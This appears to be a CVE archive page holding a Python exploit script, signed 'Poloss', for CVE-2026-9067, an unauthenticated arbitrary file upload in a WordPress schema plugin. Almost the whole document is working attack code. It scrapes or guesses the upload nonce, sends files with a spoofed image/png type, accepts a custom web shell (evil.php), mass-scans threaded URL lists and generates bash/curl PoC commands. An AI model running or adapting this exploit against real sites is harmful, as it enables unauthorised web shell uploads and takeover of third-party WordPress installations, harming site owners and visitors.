5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-9067.py PY
#!/usr/bin/env python3
"""
CVE-2026-9067 Exploit - Enhanced Version
Schema & Structured Data for WP & AMP < 1.60 - Unauthenticated Arbitrary Media Upload

Made By Poloss
"""

import argparse
import concurrent.futures
import os
import sys
import time
import random
import string
import re
import requests
from urllib.parse import urlparse
from datetime import datetime

# Colors for output
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
CYAN = '\033[96m'
RESET = '\033[0m'
BOLD = '\033[1m'

# Default headers
DEFAULT_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'
}

def log(msg, level="INFO"):
    """Print colored log messages"""
    timestamp = datetime.now().strftime("%H:%M:%S")
    colors = {
        "INFO": BLUE,
        "SUCCESS": GREEN,
        "WARNING": YELLOW,
        "ERROR": RED,
        "VULN": RED + BOLD,
        "DEBUG": CYAN
    }
    color = colors.get(level, RESET)
    print(f"{color}[{timestamp}] [{level}] {msg}{RESET}")

def generate_random_string(length=8):
    """Generate random string for filename"""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def check_plugin_version(url):
    """Check if target has vulnerable plugin version"""
    headers = {**DEFAULT_HEADERS, 'Cache-Control': 'no-cache'}

    # Check readme.txt for version
    paths = [
        '/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt',
        '/wp-content/plugins/schema-and-structured-data-for-wp/README.md',
    ]

    for path in paths:
        try:
            resp = requests.get(url.rstrip('/') + path, headers=headers, timeout=10, verify=False)
            if resp.status_code == 200:
                # Look for version in readme
                for line in resp.text.split('\n'):
                    if 'Stable tag:' in line:
                        version = line.split(':')[-1].strip()
                        return version
        except:
            pass

    return "unknown"

def get_nonce(url, verbose=False):
    """
    Get the saswp_rf_form_action_nonce from the target
    The nonce is emitted on any page that renders the review form
    """
    headers = {**DEFAULT_HEADERS, 'Cache-Control': 'no-cache'}
    base_url = url.rstrip('/')

    # Try multiple pages to find the nonce
    pages_to_check = [
        '/',
        '/?s=test',
        '/?p=1',
        '/wp-login.php',
        '/?page_id=1',
    ]

    # Also check if there's a review page or shortcode
    # The nonce might be in localized data
    patterns = [
        # Standard WordPress nonce pattern
        r'saswp_rf_page_security_nonce["\']?\s*:\s*["\']([a-f0-9]{10})["\']',
        r'saswp_rf_form_action_nonce["\']?\s*:\s*["\']([a-f0-9]{10})["\']',
        r'"saswp_rf_page_security_nonce"\s*:\s*"([a-f0-9]{10})"',
        r'"saswp_rf_form_action_nonce"\s*:\s*"([a-f0-9]{10})"',
        # Alternative patterns
        r'nonce["\']?\s*:\s*["\'][a-f0-9]{10}["\']',
        r'security["\']?\s*:\s*["\']([a-f0-9]{10})["\']',
    ]

    for page in pages_to_check:
        try:
            resp = requests.get(base_url + page, headers=headers, timeout=15, verify=False)
            if resp.status_code == 200:
                for pattern in patterns:
                    matches = re.findall(pattern, resp.text, re.IGNORECASE)
                    if matches:
                        if verbose:
                            log(f"Found nonce on {page}: {matches[0]}", "DEBUG")
                        return matches[0]
        except Exception as e:
            if verbose:
                log(f"Error checking {page}: {e}", "DEBUG")

    # Try to get nonce from REST API
    try:
        resp = requests.get(base_url + '/wp-json/', headers=headers, timeout=10, verify=False)
        if resp.status_code == 200:
            # Check nonce in response headers or body
            nonce_match = re.findall(r'[a-f0-9]{10}', resp.text)
            if nonce_match:
                return nonce_match[0]
    except:
        pass

    return None

def try_nonce_bruteforce(url):
    """
    Try to generate nonce using WordPress REST API nonce generation
    WordPress nonces are generated using wp_create_nonce which uses user ID, session token, and action
    """
    headers = {**DEFAULT_HEADERS}

    # Try common WordPress nonce generation patterns
    # The nonce for 'saswp_rf_form_action_nonce' can be calculated
    # But without being logged in, we can't generate it the same way

    # However, the vulnerability allows unauthenticated upload IF we can get/guess the nonce
    # Some plugins expose the nonce on frontend without requiring auth

    # Try to access pages that might expose it
    test_urls = [
        '/wp-content/plugins/schema-and-structured-data-for-wp/assets/js/',
        '/?saswp_rf=1',
        '/?saswp_review=1',
    ]

    for test_url in test_urls:
        try:
            resp = requests.get(url.rstrip('/') + test_url, headers=headers, timeout=10, verify=False)
            if resp.status_code == 200:
                nonce_match = re.findall(r'[a-f0-9]{10}', resp.text)
                if nonce_match:
                    return nonce_match[0]
        except:
            pass

    return None

def test_upload_with_nonce(url, nonce, endpoint='image', custom_shell=None, verbose=False):
    """
    Test file upload with a specific nonce
    Returns: (success, file_info, message)
    """
    headers = {**DEFAULT_HEADERS, 'Cache-Control': 'no-cache'}
    base_url = url.rstrip('/')

    if endpoint == 'image':
        action = 'saswp_rf_form_image_upload'
        param_name = 'saswp-rf-form-image'
    else:
        action = 'saswp_rf_form_video_upload'
        param_name = 'saswp-rf-form-video'

    ajax_url = f"{base_url}/wp-admin/admin-ajax.php"

    # Prepare file content
    if custom_shell and os.path.exists(custom_shell):
        with open(custom_shell, 'r') as f:
            file_content = f.read()
        filename = os.path.basename(custom_shell)
    else:
        filename = f"exploit_{generate_random_string()}.txt"
        file_content = f"<!-- CVE-2026-9067 Test -->\nTimestamp: {datetime.now().isoformat()}\n"
        file_content += f"Uploaded via {endpoint} endpoint\n"

    try:
        files = {
            param_name: (filename, file_content, 'image/png')
        }

        data = {
            'action': action,
            'saswp_rf_form_nonce': nonce
        }

        if verbose:
            log(f"Attempting upload with nonce: {nonce}", "DEBUG")

        resp = requests.post(
            ajax_url,
            files=files,
            data=data,
            headers=headers,
            timeout=30,
            verify=False
        )

        if verbose:
            log(f"Response status: {resp.status_code}", "DEBUG")
            log(f"Response body: {resp.text[:500]}", "DEBUG")

        try:
            json_resp = resp.json()
            if json_resp.get('success') == True:
                file_info = json_resp.get('data', {}).get('file_info', {})
                file_id = file_info.get('id')
                file_url = file_info.get('url')

                return True, {
                    'id': file_id,
                    'url': file_url,
                    'filename': filename,
                    'endpoint': endpoint
                }, f"SUCCESS! Uploaded via {endpoint} endpoint"
            else:
                return False, None, f"Upload failed: {json_resp}"
        except:
            return False, None, f"Invalid response: {resp.text[:200]}"

    except Exception as e:
        return False, None, f"Error: {str(e)}"

def check_vulnerability_detailed(url, custom_shell=None, verbose=False):
    """
    Comprehensive vulnerability check
    """
    base_url = url.rstrip('/')
    results = {
        'url': url,
        'vulnerable': False,
        'plugin_version': 'unknown',
        'nonce_found': False,
        'upload_success': False,
        'file_info': None,
        'message': ''
    }

    # Check plugin version
    version = check_plugin_version(url)
    results['plugin_version'] = version

    if verbose:
        log(f"Plugin version: {version}", "INFO")

    if version == 'unknown':
        results['message'] = "Plugin not detected or not accessible"
        return results

    # Try to get nonce
    nonce = get_nonce(url, verbose)

    if nonce:
        results['nonce_found'] = True
        if verbose:
            log(f"Found nonce: {nonce}", "SUCCESS")

        # Try upload via image endpoint
        success, file_info, msg = test_upload_with_nonce(url, nonce, 'image', custom_shell, verbose)

        if success:
            results['vulnerable'] = True
            results['upload_success'] = True
            results['file_info'] = file_info
            results['message'] = f"VULNERABLE! {msg}. File ID: {file_info.get('id')}"
            return results

        # Try video endpoint
        success, file_info, msg = test_upload_with_nonce(url, nonce, 'video', custom_shell, verbose)

        if success:
            results['vulnerable'] = True
            results['upload_success'] = True
            results['file_info'] = file_info
            results['message'] = f"VULNERABLE! {msg}. File ID: {file_info.get('id')}"
            return results

        results['message'] = f"Nonce found ({nonce}) but upload failed - plugin might be patched or requires specific setup"

    else:
        # Try common nonce patterns (some sites might use predictable nonces)
        common_nonces = [
            '0000000000',
            '1111111111',
            'abcdef1234',
            '1234567890',
        ]

        for test_nonce in common_nonces:
            success, file_info, msg = test_upload_with_nonce(url, test_nonce, 'image', custom_shell, verbose)
            if success:
                results['vulnerable'] = True
                results['upload_success'] = True
                results['file_info'] = file_info
                results['message'] = f"VULNERABLE! Upload with nonce {test_nonce}"
                return results

        results['message'] = "Could not find nonce - review form might not be rendered on any page"

    return results

def verify_upload(url, file_info):
    """Verify uploaded file is accessible"""
    if not file_info:
        return None

    base_url = url.rstrip('/')
    filename = file_info.get('filename', '')

    # Files are stored in /wp-content/uploads/YYYY/MM/
    current_year = datetime.now().year
    current_month = datetime.now().month

    paths_to_check = [
        f"/wp-content/uploads/{current_year}/{current_month:02d}/{filename}",
        f"/wp-content/uploads/{filename}",
    ]

    for path in paths_to_check:
        try:
            resp = requests.get(base_url + path, timeout=10, verify=False)
            if resp.status_code == 200:
                return path
        except:
            pass

    return None

def generate_bash_poc(url, custom_shell=None):
    """Generate bash/curl PoC command"""
    poc = f'''#!/bin/bash
# CVE-2026-9067 Bash PoC
# Target: {url}

TARGET="{url}"

# Method 1: Get nonce from page source and upload
echo "[*] Getting nonce from page..."
NONCE=$(curl -s "$TARGET" | grep -oP 'saswp_rf_[^"]*nonce[^"]*"[^"]*[a-f0-9]]{{10}}["'\\'' ]]' | grep -oP '[a-f0-9]{{10}}' | head -1)

if [ -z "$NONCE" ]; then
    echo "[-] Nonce not found. Trying alternative methods..."
    # Try to get nonce from any page that might render the form
    for page in "/" "/?s=test" "/?p=1"; do
        NONCE=$(curl -s "$TARGET$page" | grep -oP 'saswp_rf_[^"]*nonce[^"]*"[^"]*[a-f0-9]]{{10}}["'\\'' ]]' | grep -oP '[a-f0-9]{{10}}' | head -1)
        if [ ! -z "$NONCE" ]; then
            break
        fi
    done
fi

if [ -z "$NONCE" ]; then
    echo "[-] Could not find nonce. The review form might not be rendered on this site."
    echo "[*] Try manually: Visit any post/page that might have the review form and check page source for 'saswp_rf_page_security_nonce'"
    exit 1
fi

echo "[+] Found nonce: $NONCE"

# Upload via IMAGE endpoint (spoofing Content-Type as image/png)
echo "[*] Uploading file via image endpoint..."
'''

    if custom_shell and os.path.exists(custom_shell):
        poc += f'''
curl -X POST "$TARGET/wp-admin/admin-ajax.php" \\
  -F "action=saswp_rf_form_image_upload" \\
  -F "saswp_rf_form_nonce=$NONCE" \\
  -F "saswp-rf-form-image=@{custom_shell};type=image/png;filename=evil.php"
'''
    else:
        poc += f'''
curl -X POST "$TARGET/wp-admin/admin-ajax.php" \\
  -F "action=saswp_rf_form_image_upload" \\
  -F "saswp_rf_form_nonce=$NONCE" \\
  -F "saswp-rf-form-image=@/tmp/test.txt;type=image/png;filename=evil.txt"

echo ""
echo "[*] If successful, the file should be accessible at:"
echo "    $TARGET/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.txt"
'''

    poc += '''
# Also try video endpoint
echo "[*] Trying video endpoint..."
curl -X POST "$TARGET/wp-admin/admin-ajax.php" \\
  -F "action=saswp_rf_form_video_upload" \\
  -F "saswp_rf_form_nonce=$NONCE" \\
  -F "saswp-rf-form-video=@/tmp/test.txt;type=video/mp4;filename=evil.txt"
'''
    return poc

def scan_url(url, custom_shell=None, verbose=False):
    """Scan a single URL for the vulnerability"""
    url = url.strip()

    if not url:
        return None

    # Ensure URL has scheme
    if not url.startswith(('http://', 'https://')):
        url = 'https://' + url

    log(f"Scanning: {url}", "INFO")

    # Check if site is reachable
    try:
        resp = requests.get(url, timeout=10, verify=False, allow_redirects=True)
        if resp.status_code not in [200, 301, 302, 303, 307, 308]:
            return {'url': url, 'status': 'unreachable', 'vulnerable': False}
    except:
        return {'url': url, 'status': 'unreachable', 'vulnerable': False}

    # Run comprehensive vulnerability check
    result = check_vulnerability_detailed(url, custom_shell, verbose)

    return result

def save_results(results, output_file):
    """Save scan results to file"""
    with open(output_file, 'w') as f:
        f.write("=" * 80 + "\n")
        f.write("CVE-2026-9067 SCAN RESULTS\n")
        f.write(f"Scan Date: {datetime.now().isoformat()}\n")
        f.write("=" * 80 + "\n\n")

        vulnerable_count = 0

        for result in results:
            if result:
                f.write(f"URL: {result.get('url', 'N/A')}\n")
                f.write(f"Status: {result.get('status', 'unknown')}\n")
                f.write(f"Plugin Version: {result.get('plugin_version', 'unknown')}\n")

                if result.get('vulnerable'):
                    vulnerable_count += 1
                    f.write(f"{'='*40}\n")
                    f.write(f"VULNERABLE!\n")
                    f.write(f"{'='*40}\n")
                else:
                    f.write(f"Safe/Not Vulnerable\n")

                f.write(f"Message: {result.get('message', 'N/A')}\n")

                if result.get('file_info'):
                    f.write(f"File ID: {result.get('file_info', {}).get('id')}\n")
                    f.write(f"Filename: {result.get('file_info', {}).get('filename')}\n")

                f.write("-" * 40 + "\n\n")

        f.write("\n" + "=" * 80 + "\n")
        f.write(f"SUMMARY: {vulnerable_count}/{len(results)} targets are vulnerable\n")
        f.write("=" * 80 + "\n")

def print_banner():
    """Print exploit banner"""
    print(f"""
Made By Poloss
    """)

def main():
    parser = argparse.ArgumentParser(
        description='CVE-2026-9067 - Schema & Structured Data for WP & AMP < 1.60 Unauthenticated Arbitrary Media Upload',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python3 CVE-2026-9067.py -f urls.txt -t 10 -o vulns.txt
  python3 CVE-2026-9067.py -f urls.txt -t 5 -s shell.php -o results.txt
  python3 CVE-2026-9067.py -u https://target.com -o result.txt
  python3 CVE-2026-9067.py -u https://target.com --bash-poc > exploit.sh

Note: The nonce is required for the exploit. It is emitted on any page that
renders the review form (saswp_rf_localize_data.saswp_rf_page_security_nonce).
        """
    )

    parser.add_argument('-f', '--file', help='File containing URLs to scan (one per line)')
    parser.add_argument('-u', '--url', help='Single URL to scan')
    parser.add_argument('-t', '--threads', type=int, default=5, help='Number of threads (default: 5)')
    parser.add_argument('-o', '--output', default='vulns.txt', help='Output file for results (default: vulns.txt)')
    parser.add_argument('-s', '--shell', help='Custom shell file to upload')
    parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
    parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds')
    parser.add_argument('--bash-poc', action='store_true', help='Generate bash/curl PoC for single URL')

    args = parser.parse_args()

    # Suppress SSL warnings
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Get URLs to scan
    urls = []

    if args.file:
        if not os.path.exists(args.file):
            log(f"URL file not found: {args.file}", "ERROR")
            sys.exit(1)

        with open(args.file, 'r') as f:
            urls = [line.strip() for line in f if line.strip()]

        log(f"Loaded {len(urls)} URLs from {args.file}", "INFO")
    elif args.url:
        urls = [args.url]
        if args.bash_poc:
            print(generate_bash_poc(args.url, args.shell))
            sys.exit(0)
    else:
        log("Please provide either -f (file) or -u (single URL)", "ERROR")
        parser.print_help()
        sys.exit(1)

    # Validate custom shell file
    if args.shell:
        if not os.path.exists(args.shell):
            log(f"Shell file not found: {args.shell}", "ERROR")
            sys.exit(1)
        log(f"Using custom shell: {args.shell}", "INFO")

    # Banner
    print_banner()

    log(f"Starting scan with {args.threads} threads...", "INFO")
    log(f"Output file: {args.output}", "INFO")

    # Scan URLs
    results = []

    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = {executor.submit(scan_url, url, args.shell, args.verbose): url for url in urls}

        for future in concurrent.futures.as_completed(futures):
            try:
                result = future.result(timeout=args.timeout)
                if result:
                    results.append(result)

                    if result.get('vulnerable'):
                        log(f"VULNERABLE: {result.get('url')}", "VULN")
                        log(f"  {result.get('message')}", "VULN")
                    else:
                        log(f"SAFE: {result.get('url')} - {result.get('message', 'Not vulnerable')}", "INFO")
            except concurrent.futures.TimeoutError:
                log(f"Timeout scanning: {futures[future]}", "ERROR")
            except Exception as e:
                log(f"Error scanning: {e}", "ERROR")

    # Save results
    save_results(results, args.output)
    log(f"Results saved to: {args.output}", "INFO")

    # Summary
    vulnerable_count = sum(1 for r in results if r and r.get('vulnerable'))
    log(f"Scan complete! {vulnerable_count}/{len(results)} targets are vulnerable",
        "SUCCESS" if vulnerable_count == 0 else "WARNING")

if __name__ == '__main__':
    main()